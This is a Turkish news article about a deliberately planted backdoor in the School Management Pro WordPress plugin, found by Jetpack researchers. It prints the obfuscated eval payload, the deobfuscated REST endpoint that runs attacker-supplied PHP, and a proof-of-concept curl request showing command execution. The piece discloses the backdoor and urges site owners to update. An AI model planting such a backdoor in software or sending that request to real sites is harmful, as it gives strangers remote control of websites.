Araştırmacılar Cuma günü, bir WordPress eklentisinde, saldırganlara okullara pazarlanan paketi kullanan web sitelerinin tam kontrolünü sağlayan kötü amaçlı bir arka kapı bulduklarını söyledi.
Premium sürümü Okul yönetimiWeb sitesi güvenlik hizmeti Jetpack araştırmacıları, okulların web sitelerini işletmek ve yönetmek için kullandıkları bir eklentinin, en az 8.9 sürümünden beri arka kapıyı içerdiğini söyledi. Blog yazısı daha önceki sürümlerde mevcut olduğunu dışlamadan. Bu sayfa üçüncü taraf bir siteden, 8.9 sürümünün geçen Ağustos ayında yayınlandığını gösteriyor.
bariz arka kapı
Jetpack, WordPress.com’daki destek ekibi üyelerinin School Management Pro’yu kullanan birkaç sitede çok karmaşık kod bulduğunu bildirmesinin ardından arka kapıyı keşfettiğini söyledi. Gizlemeyi kaldırdıktan sonra, eklentinin lisans kontrol bölümünde saklanan kodun, sitelerin kontrolünü yabancılara verme yeteneği vermek amacıyla kasıtlı olarak oraya yerleştirildiğini fark ettiler.
Jetpack gönderisinde, “Kodun kendisi o kadar da ilginç değil: eklentinin lisans kontrol koduna enjekte edilen bariz bir arka kapı” dedi. “Herhangi bir saldırganın, eklentinin yüklü olduğu sitede rastgele PHP kodu yürütmesine izin verir.”
Gizlenmiş haliyle kod şuna benziyordu:
}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey
Gizlemenin kaldırılmasından sonra kod şuydu:
add_action( "rest_api_init', function() {
register_rest_route(
'am-member', 'license',
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => function( $request ) {
$args = $request->get_params();
if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
eval( $args['blowf'] );
}
},
)
);
} );
Araştırmacılar, gizlenmiş kodun gerçekten de, bilgisi olan herkesin eklentiyi çalıştıran herhangi bir sitede kendi seçtikleri kodu yürütmesine izin veren bir arka kapı olduğunu doğrulayan bir kavram kanıtı açığı yazdı.
$ curl -s -d 'blowfish=1' -d "blowf=system('id');" '
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713
gizem kalır
Eklentiyi kaç sitenin kullandığı belli değil. Weblizar, Hindistan merkezli School Management üreticisi, ana sayfasında ücretsiz ve premium temaları ve eklentileri için “340k +” müşterisi olduğunu, ancak bulunan arka kapı Jetpack’in yalnızca School Management Pro’da olduğunu söylüyor. Arka kapı, eklentinin ücretsiz sürümünde yoktu ve Weblizar’ın yayınladığı diğer eklentilere eklendiğine dair hiçbir belirti yok.
Gönderi, “Satıcıdan arka kapının ne zaman enjekte edildiği, hangi sürümlerin etkilendiği ve kodun ilk etapta eklentiye nasıl geldiği hakkında daha fazla bilgi almaya çalıştık” dedi. “Satıcı, kodun yazılımlarına ne zaman veya nasıl geldiğini bilmediğini söylediği için bu çaba başarısız oldu.”
Weblizar’a ulaşma girişimleri başarılı olmadı.
Artık arka kapının varlığı herkesin bildiği bir şey olduğundan, saldırganların eklentinin savunmasız bir sürümünü kullanan herhangi bir web sitesinde bundan yararlanma olasılığı yüksektir. Bu eklentiyi kullanan herkes hemen güncelleme yapmalıdır. Güncelleme eklenmiş olabilecek herhangi bir yeni arka kapıyı kaldırmayacağından, yama uygulandıktan sonra bile sitelerini güvenlik ihlali belirtilerine karşı dikkatli bir şekilde taramalıdırlar.
Kaynak : https://arstechnica.com/?p=1855563